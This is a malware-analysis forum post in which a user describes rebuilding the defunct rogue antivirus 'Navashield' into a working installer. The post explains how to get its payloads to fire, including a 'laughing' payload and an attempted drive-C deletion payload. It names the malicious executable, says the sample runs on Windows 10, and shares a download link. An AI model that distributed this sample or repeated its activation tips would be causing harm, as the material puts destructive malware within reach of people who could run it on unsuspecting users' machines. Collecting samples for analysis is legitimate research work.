A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #28378  by yoto
 Sat Apr 23, 2016 4:50 pm
Hi,
The rogue "Navashield", as you know, does not work anymore as it gets the trial key from navashield.com and the website has been deleted.
However, I found a forum where dannooct1 uploaded his XP VM with it installed. So I copied the installation folder, deleted navaupdate as that deactivates navashield for some reason, and made an installer.
Make sure you are connected to the internet when running it, as even though the servers are gone, it still doesn't work when not connected.
Occasionally it will deactivate itself; just run navashield.exe.
No need to change the date or time for the payload. Just wait 5 minutes.
I couldn't get the deleting drive c payload to work, but the laughing payload works fine.
I also found that Navadebugger.exe is the malicious exe that does all the laughing.
This still works fine on Windows 10.
OneDrive: https://onedrive.live.com/redir?resid=C ... =folder%2c
Attachments wouldn't work for some reason.